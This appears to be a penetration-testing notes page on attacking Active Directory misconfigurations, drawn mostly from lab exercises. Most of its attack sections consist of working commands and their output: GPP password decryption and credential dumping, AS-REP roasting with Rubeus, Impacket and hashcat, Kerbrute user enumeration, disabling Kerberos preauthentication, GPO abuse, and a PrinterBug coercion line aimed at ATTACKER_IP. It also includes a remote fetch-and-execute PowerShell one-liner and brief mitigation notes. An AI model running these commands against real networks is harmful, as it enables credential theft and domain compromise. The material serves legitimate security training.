# Misconfiguration [![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA) ## Misconfigured and dangerous logon scripts {% embed url="" %} {% embed url="" %} ```powershell # Run ScriptSentry and display results on the console IEX(Invoke-WebRequest 'https://raw.githubusercontent.com/techspence/ScriptSentry/main/Invoke-ScriptSentry.ps1') Invoke-ScriptSentry # Run ScriptSentry and save output to a text file IEX(Invoke-WebRequest 'https://raw.githubusercontent.com/techspence/ScriptSentry/main/Invoke-ScriptSentry.ps1') Invoke-ScriptSentry | Out-File c:\temp\ScriptSentry.txt # Run ScriptSentry and save results to separate csv files in the current directory IEX(Invoke-WebRequest 'https://raw.githubusercontent.com/techspence/ScriptSentry/main/Invoke-ScriptSentry.ps1') Invoke-ScriptSentry -SaveOutput $true ``` ## GPO Misconfiguration {% embed url="" %} ## PrinterBug {% embed url="" %} ```powershell-session PS C:\htb> Import-Module .\SecurityAssessment.ps1 PS C:\htb> Get-SpoolStatus -ComputerName ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL ComputerName Status ------------ ------ ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL True ``` ### NXC ``` nxc smb IP_RANGE -u username -p password -M printerbug -o LISTENER=ATTACKER_IP ```

Source: ## DNS ```shell-session adidnsdump -u inlanefreight\\forend ldap://172.16.5.5 -r ``` ```shell-session head records.csv type,name,value A,LOGISTICS,172.16.5.240 AAAA,ForestDnsZones,dead:beef::7442:c49d:e1d7:2691 AAAA,ForestDnsZones,dead:beef::231 A,ForestDnsZones,10.129.202.29 A,ForestDnsZones,172.16.5.240 A,ForestDnsZones,172.16.5.5 AAAA,DomainDnsZones,dead:beef::7442:c49d:e1d7:2691 AAAA,DomainDnsZones,dead:beef::231 A,DomainDnsZones,10.129.202.29 ``` {% content-ref url="adidns-spoofing" %} [adidns-spoofing](https://0xss0rz.gitbook.io/0xss0rz/pentest/internal-pentest/adidns-spoofing) {% endcontent-ref %} ## Password in description field {% embed url="" %} ``` PS C:\htb> Import-Module .\PowerView.ps1 ``` ```powershell-session PS C:\htb> Get-DomainUser * | Select-Object samaccountname,description |Where-Object {$_.Description -ne $null} samaccountname description -------------- ----------- administrator Built-in account for administering the computer/domain guest Built-in account for guest access to the computer/domain krbtgt Key Distribution Center Service Account ldap.agent *** DO NOT CHANGE *** 3/12/2012: Sunsh1ne4All! ``` ## PASSWD\_NOTREQD Field {% embed url="" %} ```powershell-session PS C:\htb> Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol samaccountname useraccountcontrol -------------- ------------------ guest ACCOUNTDISABLE, PASSWD_NOTREQD, NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD mlowe PASSWD_NOTREQD, NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD ehamilton PASSWD_NOTREQD, NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD $725000-9jb50uejje9f ACCOUNTDISABLE, PASSWD_NOTREQD, NORMAL_ACCOUNT nagiosagent PASSWD_NOTREQD, NORMAL_ACCOUNT ``` Then check if no password is required ## Credentials in SMB Shares and SYSVOL Scripts ```powershell-session PS C:\htb> ls \\academy-ea-dc01\SYSVOL\INLANEFREIGHT.LOCAL\scripts Directory: \\academy-ea-dc01\SYSVOL\INLANEFREIGHT.LOCAL\scripts Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 11/18/2021 10:44 AM 174 daily-runs.zip -a---- 2/28/2022 9:11 PM 203 disable-nbtns.ps1 -a---- 3/7/2022 9:41 AM 144138 Logon Banner.htm -a---- 3/8/2022 2:56 PM 979 reset_local_admin_pass.vbs ``` ## Group Policy Preferences (GPP) Passwords {% embed url="" %} {% embed url="" %} {% embed url="" %} `Groups.xml`

```shell-session gpp-decrypt VPe/o9YRyz2cksnYRbNeQj35w9KxQ5ttbvtRaAVqxaE Password1 ``` Often, GPP passwords are defined for legacy accounts, and you may therefore retrieve and decrypt the password for a locked or deleted account. However, it is worth attempting to password spray internally with this password (especially if it is unique). Password re-use is widespread, and the GPP password combined with password spraying could result in further access. ```shell-session $ crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 -M gpp_autologin SMB 172.16.5.5 445 ACADEMY-EA-DC01 [*] Windows 10.0 Build 17763 x64 (name:ACADEMY-EA-DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False) SMB 172.16.5.5 445 ACADEMY-EA-DC01 [+] INLANEFREIGHT.LOCAL\forend:Klmcargo2 GPP_AUTO... 172.16.5.5 445 ACADEMY-EA-DC01 [+] Found SYSVOL share GPP_AUTO... 172.16.5.5 445 ACADEMY-EA-DC01 [*] Searching for Registry.xml GPP_AUTO... 172.16.5.5 445 ACADEMY-EA-DC01 [*] Found INLANEFREIGHT.LOCAL/Policies/{CAEBB51E-92FD-431D-8DBE-F9312DB5617D}/Machine/Preferences/Registry/Registry.xml GPP_AUTO... 172.16.5.5 445 ACADEMY-EA-DC01 [+] Found credentials in INLANEFREIGHT.LOCAL/Policies/{CAEBB51E-92FD-431D-8DBE-F9312DB5617D}/Machine/Preferences/Registry/Registry.xml GPP_AUTO... 172.16.5.5 445 ACADEMY-EA-DC01 Usernames: ['guarddesk'] GPP_AUTO... 172.16.5.5 445 ACADEMY-EA-DC01 Domains: ['INLANEFREIGHT.LOCAL'] GPP_AUTO... 172.16.5.5 445 ACADEMY-EA-DC01 Passwords: ['ILFreightguardadmin!'] ``` {% content-ref url="../tools/netexec-cme" %} [netexec-cme](https://0xss0rz.gitbook.io/0xss0rz/pentest/tools/netexec-cme) {% endcontent-ref %} ### Mitigation The following security controls should be implemented to mitigate a Password in GPP compromise: * **Remove all GPP passwords.** This eliminates the risk of a Password in GPP compromise. * **Apply Microsoft’s security patch 2962486 to remove the functionality to create cpasswords.** This security patch prevents the creation of new cpasswords. For more information on the security patch, see Microsoft’s [Security Bulletin MS14-025](https://learn.microsoft.com/en-au/security-updates/SecurityBulletins/2014/ms14-025). ## ASREPRoasting {% hint style="info" %} *"Do not require Kerberos preauthentication"* {% endhint %}

### Without Credentials - Man-In-The-Middle ASRepCatcher {% embed url="" %} ```powershell # Actively acting as a proxy between the clients and the DC, forcing RC4 downgrade if supported ASRepCatcher relay -dc $DC_IP # Disabling ARP spoofing, the mitm position must be obtained differently ASRepCatcher relay -dc $DC_IP --disable-spoofing # Passive listening of AS-REP packets, no packet alteration ASRepCatcher listen ``` ### AS REPRoastable accounts #### PowerView ```powershell Get-DomainUser -PreauthNotRequired -Verbose ``` #### AD Module ```powershell Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth ``` ### Force Disable Kerberos Preauth {% hint style="success" %} *With sufficient rights (*[*GenericWrite or GenericAll*](https://0xss0rz.gitbook.io/0xss0rz/pentest/internal-pentest/acl)*) Kerberos preauth can be forced disabled* {% endhint %} #### PowerView ```powershell # Check for GenericWrite or GenericAll rights Find-InterstingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"} # Disable kerberos preauth for user1 Set-DomainObject -Identity user1 -XOR @{useraccountcontrol=4194304} -Verbose # Check if user is asreproastable Get-DomainUser -PreauthNotRequired -Verbose ``` #### BloodyAD ``` bloodyAD --host dc01.domain.htb -d "DOMAIN.HTB" --dc-ip 10.10.11.45 -k add uac SVC_SQL -f DONT_REQ_PREAUTH ``` ### ASREPRoast {% embed url="" %} ```powershell # One user Get-ASREPHash -UserName victim -Verbose # Enumerate all asreproastable users Invoke-ASREPRoast -Verbose ``` ### Rubeus ```powershell-session PS C:\htb> Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl samaccountname : mmorgan userprincipalname : mmorgan@inlanefreight.local useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, DONT_REQ_PREAUTH ``` ```powershell-session PS C:\htb> .\Rubeus.exe asreproast /user:mmorgan /nowrap /format:hashcat ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v2.0.2 [*] Action: AS-REP roasting [*] Target User : mmorgan [*] Target Domain : INLANEFREIGHT.LOCAL [*] Searching path 'LDAP://ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL/DC=INLANEFREIGHT,DC=LOCAL' for '(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304)(samAccountName=mmorgan))' [*] SamAccountName : mmorgan [*] DistinguishedName : CN=Matthew Morgan,OU=Server Admin,OU=IT,OU=HQ-NYC,OU=Employees,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL [*] Using domain controller: ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL (172.16.5.5) [*] Building AS-REQ (w/o preauth) for: 'INLANEFREIGHT.LOCAL\mmorgan' [+] AS-REQ w/o preauth successful! [*] AS-REP hash: $krb5asrep$23$mmorgan@INLANEFREIGHT.LOCAL:D18650F4F4E0537E0188A6897A478C55$0978822DEC13046712DB7DC03 ``` ```shell-session hashcat -m 18200 ilfreight_asrep /usr/share/wordlists/rockyou.txt ``` {% content-ref url="../cracking/hashes" %} [hashes](https://0xss0rz.gitbook.io/0xss0rz/pentest/cracking/hashes) {% endcontent-ref %} ### NXC ``` nxc ldap 192.168.0.104 -u user.txt -p '' --asreproast output.txt ``` {% embed url="" %} ### Kerbrute - No creds, but user list {% hint style="info" %} *No credentials needed, only a list of users* {% endhint %} ```shell-session $ kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt __ __ __ / /_____ _____/ /_ _______ __/ /____ / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \ / ,< / __/ / / /_/ / / / /_/ / /_/ __/ /_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/ Version: dev (9cfb81e) - 04/01/22 - Ronnie Flathers @ropnop 2022/04/01 13:14:17 > Using KDC(s): 2022/04/01 13:14:17 > 172.16.5.5:88 2022/04/01 13:14:17 > [+] VALID USERNAME: sbrown@inlanefreight.local 2022/04/01 13:14:17 > [+] VALID USERNAME: jjones@inlanefreight.local 2022/04/01 13:14:17 > [+] VALID USERNAME: tjohnson@inlanefreight.local 2022/04/01 13:14:17 > [+] VALID USERNAME: jwilson@inlanefreight.local 2022/04/01 13:14:17 > [+] VALID USERNAME: bdavis@inlanefreight.local 2022/04/01 13:14:17 > [+] VALID USERNAME: njohnson@inlanefreight.local 2022/04/01 13:14:17 > [+] VALID USERNAME: asanchez@inlanefreight.local 2022/04/01 13:14:17 > [+] VALID USERNAME: dlewis@inlanefreight.local 2022/04/01 13:14:17 > [+] VALID USERNAME: ccruz@inlanefreight.local 2022/04/01 13:14:17 > [+] mmorgan has no pre auth required. Dumping hash to crack offline: $krb5asrep$23$mmorgan@INLANEFREIGHT.LOCAL:400d306dda575be3d429aad39ec68a33$8698ee ``` ### Impacket - No creds, but user list {% hint style="info" %} *No credentials needed, only a username list* {% endhint %} ``` $ GetNPUsers.py htb.local/ -dc-ip 192.168.3.203 -no-pass -usersfile /usr/share/seclists/Usernames/Names/names.txt -request -format hashcat -outputfile asrep.hash -debug |tee getnpusers.log $ cat getnpusers.log |grep -v 'Client not found in Kerberos database' ``` ```shell-session $ GetNPUsers.py INLANEFREIGHT.LOCAL/ -dc-ip 172.16.5.5 -no-pass -usersfile valid_ad_users Impacket v0.9.24.dev1+20211013.152215.3fe2d73a - Copyright 2021 SecureAuth Corporation [-] User sbrown@inlanefreight.local doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User jjones@inlanefreight.local doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User tjohnson@inlanefreight.local doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User jwilson@inlanefreight.local doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User bdavis@inlanefreight.local doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User njohnson@inlanefreight.local doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User asanchez@inlanefreight.local doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User dlewis@inlanefreight.local doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User ccruz@inlanefreight.local doesn't have UF_DONT_REQUIRE_PREAUTH set $krb5asrep$23$mmorgan@inlanefreight.local@INLANEFREIGHT.LOCAL:47e0d517f2a5815da8345dd9247a0e3d$b62d45bc3c0f4c306402a205ebdbbc623d77ad016e657337630c70f651451400329545fb634c9d329ed024ef145bdc2afd4af498b2f0092766effe6ae12b3c3beac28e6ded0b542e85d3fe52467945d98a722cb52e2b37325a53829ecf127d10ee98f8a583d7912e6ae3c702b946b65153bac16c97b7f8f2d4c2811b7feba92d8bd99cdeacc8114289573ef225f7c2913647db68aafc43a1c98aa032c123b2c9db06d49229c9de94b4b476733a5f3dc5cc1bd7a9a34c18948edf8c9c124c52a36b71d2b1ed40e081abbfee564da3a0ebc734781fdae75d3882f3d1d68afdb2ccb135028d70d1aa3c0883165b3321e7a1c5c8d7c215f12da8bba9 [-] User rramirez@inlanefreight.local doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User jwallace@inlanefreight.local doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User jsantiago@inlanefreight.local doesn't have UF_DONT_REQUIRE_PREAUTH set ``` {% embed url="" %} ### SharpADWS {% embed url="" %} ``` C:\Users\Marcus>SharpADWS.exe DontReqPreAuth -action list [*] Found users that do not require kerberos preauthentication: [*] CN=Bob,CN=Users,DC=corp,DC=local [*] CN=Alice,CN=Users,DC=corp,DC=local [*] CN=John,CN=Users,DC=corp,DC=local ``` ### ASREPRoast to Kerberoast As soon as you have an ASREProastable account, you can request service tickets for any account that has a SPN (Service Principal Name) set

### Mitigation The following security control should be implemented to mitigate AS-REP Roasting: * **Ensure user objects require Kerberos pre-authentication**. AS-REP Roasting is mitigated if all user objects require Kerberos pre-authentication. However, if user objects must be configured to bypass Kerberos pre-authentication, then these user objects should be granted the minimum set of privileges required for them to perform their functions and should not be members of highly privileged security groups, such as Domain Admins. Additionally, set a minimum 30-character password for service accounts or a minimum 15-character password for users, and ensure the password is unique, unpredictable and managed. ### Resources {% embed url="" %} {% embed url="" %} {% embed url="" %} {% embed url="" %} ## Group Policy Object (GPO) Abuse Use [group3r](https://github.com/Group3r/Group3r), [ADRecon](https://github.com/sense-of-security/ADRecon), [PingCastle](https://www.pingcastle.com/), among others, to audit the security of GPOs in a domain. Precompiled tools - SharpGPO: {% embed url="" %} ### PowerView ```powershell-session PS C:\htb> Get-DomainGPO |select displayname displayname ----------- Default Domain Policy Default Domain Controllers Policy Deny Control Panel Access Disallow LM Hash Deny CMD Access Disable Forced Restarts Block Removable Media Disable Guest Account Service Accounts Password Policy Logon Banner Disconnect Idle RDP Disable NetBIOS AutoLogon GuardAutoLogon Certificate Services ``` ### Built-In Cmdlet ```powershell-session PS C:\htb> Get-GPO -All | Select DisplayName DisplayName ----------- Certificate Services Default Domain Policy Disable NetBIOS Disable Guest Account AutoLogon Default Domain Controllers Policy Disconnect Idle RDP Disallow LM Hash Deny CMD Access Block Removable Media GuardAutoLogon Service Accounts Password Policy Logon Banner Disable Forced Restarts Deny Control Panel Access ``` ### **Enumerating Domain User GPO Rights** ```powershell-session PS C:\htb> $sid=Convert-NameToSid "Domain Users" PS C:\htb> Get-DomainGPO | Get-ObjectAcl | ?{$_.SecurityIdentifier -eq $sid} ObjectDN : CN={7CA9C789-14CE-46E3-A722-83F4097AF532},CN=Policies,CN=System,DC=INLANEFREIGHT,DC=LOCAL ObjectSID : ActiveDirectoryRights : CreateChild, DeleteChild, ReadProperty, WriteProperty, Delete, GenericExecute, WriteDacl, WriteOwner BinaryLength : 36 AceQualifier : AccessAllowed IsCallback : False OpaqueLength : 0 AccessMask : 983095 SecurityIdentifier : S-1-5-21-3842939050-3880317879-2865463114-513 AceType : AccessAllowed AceFlags : ObjectInherit, ContainerInherit IsInherited : False InheritanceFlags : ContainerInherit, ObjectInherit PropagationFlags : None AuditFlags : None ``` ```powershell-session PS C:\htb Get-GPO -Guid 7CA9C789-14CE-46E3-A722-83F4097AF532 DisplayName : Disconnect Idle RDP DomainName : INLANEFREIGHT.LOCAL Owner : INLANEFREIGHT\Domain Admins Id : 7ca9c789-14ce-46e3-a722-83f4097af532 GpoStatus : AllSettingsEnabled Description : CreationTime : 10/28/2021 3:34:07 PM ModificationTime : 4/5/2022 6:54:25 PM UserVersion : AD Version: 0, SysVol Version: 0 ComputerVersion : AD Version: 0, SysVol Version: 0 WmiFilter : ``` ### Exploit Tools - GPOAbuse {% embed url="" %} {% embed url="" %} ### Group3r {% embed url="" %} ```cmd-session C:\htb> group3r.exe -f ```

GUI for Group3r: {% embed url="" %} ### GPOddity - Exploit GPO through NTLM relay {% embed url="" %} {% embed url="" %} ### Resources {% embed url="" %} ## Interesting Book {% content-ref url="../../interesting-books" %} [interesting-books](https://0xss0rz.gitbook.io/0xss0rz/interesting-books) {% endcontent-ref %} {% hint style="info" %} ***Disclaimer**: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.* {% endhint %} * [**Pentesting Active Directory and Windows-based Infrastructure**](https://www.amazon.fr/dp/1804611360?tag=0xss0rz-21)\ Enhance your skill set to pentest against real-world Microsoft infrastructure with hands-on exercises and by following attack/detect guidelines with OpSec considerations * [**Infrastructure Attack Strategies for Ethical Hacking**](https://www.amazon.fr/dp/8196994729?tag=0xss0rz-21)\ Encompassing both external and internal enumeration techniques, the book delves into attacking routers and services, establishing footholds, privilege escalation, lateral movement, and exploiting databases and Active Directory. * [**RTFM: Red Team Field Manual v2**](https://www.amazon.fr/dp/1075091837?tag=0xss0rz-21)\ A quick reference when there is no time to scour the Internet for that perfect command * [**Red Team Development and Operations: A practical guide**](https://www.amazon.fr/dp/B0842BMMCC?tag=0xss0rz-21)\ The authors have moved beyond SANS training and use this book to detail red team operations in a practical guide. * [**Cybersecurity Attacks – Red Team Strategies**](https://www.amazon.fr/dp/B0822G9PTM?tag=0xss0rz-21)\ A practical guide to building a penetration testing program having homefield advantage ## Support this Gitbook I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it. [![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA) [![buymeacoffee](https://cdn.buymeacoffee.com/buttons/v2/default-yellow.png)](https://buymeacoffee.com/0xss0rz)